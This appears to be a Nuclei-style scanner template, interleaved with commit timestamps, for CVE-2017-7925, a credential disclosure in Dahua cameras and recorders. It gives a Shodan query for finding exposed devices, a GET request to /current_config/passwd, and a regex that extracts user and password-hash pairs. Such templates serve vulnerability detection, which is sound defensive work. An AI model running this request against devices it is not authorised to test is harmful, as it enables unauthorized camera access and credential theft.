2023-07-13 21:56:00 +00:00
id : CVE-2017-7925
info :
name : Dahua Security - Configuration File Disclosure
author : E1A,none
severity : critical
description : |
A Password in Configuration File issue was discovered in Dahua DH-IPC-HDBW23A0RN-ZS, DH-IPC-HDBW13A0SN, DH-IPC-HDW1XXX, DH-IPC-HDW2XXX, DH-IPC-HDW4XXX, DH-IPC-HFW1XXX, DH-IPC-HFW2XXX, DH-IPC-HFW4XXX, DH-SD6CXX, DH-NVR1XXX, DH-HCVR4XXX, DH-HCVR5XXX, DHI-HCVR51A04HE-S3, DHI-HCVR51A08HE-S3, and DHI-HCVR58A32S-S2 devices. The password in configuration file vulnerability was identified, which could lead to a malicious user assuming the identity of a privileged user and gaining access to sensitive information.
2023-09-27 15:51:13 +00:00
impact : |
This vulnerability can lead to unauthorized access to sensitive information, potentially compromising the security of the system.
2023-09-06 13:22:34 +00:00
remediation : |
To remediate this vulnerability, ensure that the configuration file is properly secured and access to it is restricted to authorized personnel only.
2023-07-13 21:56:00 +00:00
reference :
- https://nvd.nist.gov/vuln/detail/CVE-2017-7925
- https://ics-cert.us-cert.gov/advisories/ICSA-17-124-02
2023-08-31 11:46:18 +00:00
- http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php
2023-07-13 21:56:00 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2017-7925
2024-01-29 17:11:14 +00:00
cwe-id : CWE-522,CWE-260
2024-03-23 09:28:19 +00:00
epss-score : 0.42592
epss-percentile : 0.97235
2023-09-06 13:22:34 +00:00
cpe : cpe:2.3:o:dahuasecurity:dh-ipc-hdbw23a0rn-zs_firmware:-:*:*:*:*:*:*:*
2023-07-13 21:56:00 +00:00
metadata :
max-request : 1
vendor : dahuasecurity
2023-09-06 13:22:34 +00:00
product : dh-ipc-hdbw23a0rn-zs_firmware
2023-07-13 21:56:00 +00:00
shodan-query : http.favicon.hash:2019488876
2023-12-05 09:50:33 +00:00
tags : cve,cve2017,dahua,camera,dahuasecurity
2023-07-13 21:56:00 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/current_config/passwd"
matchers :
- type : dsl
dsl :
- contains(to_lower(body), "ugm")
- contains(to_lower(body), "id:name:passwd")
- status_code == 200
condition : and
extractors :
- type : regex
group : 1
regex :
- 1 : (.*:.*):1:CtrPanel
2024-03-25 11:57:16 +00:00
# digest: 4a0a00473045022100b025841e51356e6480d45b4bdac30058df82b301fc177b329ddfaae64739dc7d022055c5f87e84ec531417e24f1d4eacca97cbb1485d8cda61206978c53803ee605b:922c64590222798bb761d5b6d8e72950